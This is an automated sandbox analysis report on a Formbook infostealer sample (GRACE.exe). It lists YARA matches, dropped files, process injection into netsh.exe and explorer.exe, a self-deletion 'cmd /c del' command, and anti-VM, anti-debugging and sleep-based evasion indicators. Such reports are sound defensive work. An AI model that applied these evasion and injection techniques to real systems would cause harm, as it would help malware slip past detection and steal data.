Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BD616 17_2_037BD616
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C2EF7 17_2_037C2EF7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C1D55 17_2_037C1D55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_036F0D20 17_2_036F0D20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C2D07 17_2_037C2D07
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370D5E0 17_2_0370D5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037C25DD 17_2_037C25DD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03722581 17_2_03722581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037BD466 17_2_037BD466
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0370841F 17_2_0370841F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1E197 17_2_00D1E197
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D02D90 17_2_00D02D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D02D87 17_2_00D02D87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D09E40 17_2_00D09E40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D09E3F 17_2_00D09E3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1DF97 17_2_00D1DF97
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D02FB0 17_2_00D02FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1DFAA 17_2_00D1DFAA
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: String function: 0133B150 appears 133 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 036FB150 appears 54 times
Sample file is different than original file name gathered from version info
Source: GRACE.exe, 00000000.00000002.292894435.0000000002600000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe6.dll" vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.296613818.00000000059D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHCore1.dll0 vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAddInProcess32.exeT vs GRACE.exe
Uses 32bit PE files
Source: GRACE.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@12/1
Source: C:\Users\user\Desktop\GRACE.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GRACE.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
Source: C:\Users\user\Desktop\GRACE.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to behavior
Source: GRACE.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GRACE.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: GRACE.exe Virustotal: Detection: 62%
Source: GRACE.exe Metadefender: Detection: 16%
Source: GRACE.exe ReversingLabs: Detection: 43%
Source: unknown Process created: C:\Users\user\Desktop\GRACE.exe 'C:\Users\user\Desktop\GRACE.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GRACE.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: GRACE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GRACE.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: GRACE.exe Static file information: File size 3215360 > 1048576
Source: GRACE.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x310400
Source: GRACE.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_004F050E push es; retf 0_2_004F0530
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_004F04A6 push es; retf 0_2_004F0530
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026388F0 pushfd ; retf 0_2_026388F1
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FC54A pushfd ; ret 0_2_026FC551
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FC511 push FFFFFF8Bh; iretd 0_2_026FC513
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CEB5 push eax; ret 10_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CF6C push eax; ret 10_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CF02 push eax; ret 10_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CF0B push eax; ret 10_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0138D0D1 push ecx; ret 10_2_0138D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0374D0D1 push ecx; ret 17_2_0374D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1D856 push esi; ret 17_2_00D1D859
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CEB5 push eax; ret 17_2_00D1CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CF6C push eax; ret 17_2_00D1CF72
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CF02 push eax; ret 17_2_00D1CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CF0B push eax; ret 17_2_00D1CF72

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\GRACE.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\GRACE.exe File opened: C:\Users\user\Desktop\GRACE.exe\:Zone.Identifier read attributes | delete Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000D098E4 second address: 0000000000D098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000D09B5E second address: 0000000000D09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00409A90 rdtsc 10_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\GRACE.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\GRACE.exe Window / User API: threadDelayed 685 Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe Window / User API: threadDelayed 9173 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\GRACE.exe TID: 6852 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe TID: 6852 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe TID: 6856 Thread sleep count: 685 > 30 Jump to behavior
Source: C:\Users\user\Desktop\GRACE.exe TID: 6856 Thread sleep count: 9173 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 1260 Thread sleep time: -92000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 3476 Thread sleep time: -100000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmware svga
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: cmd.txtQEMUqemu
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: explorer.exe, 00000010.00000000.305340019.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: virtual-vmware pointing device
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000010.00000002.637677644.0000000004DF3000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#5&L
Source: explorer.exe, 00000010.00000000.309365521.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmware
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: explorer.exe, 00000010.00000000.310539218.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWw5%SystemRoot%\system32\mswsock.dllP1
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
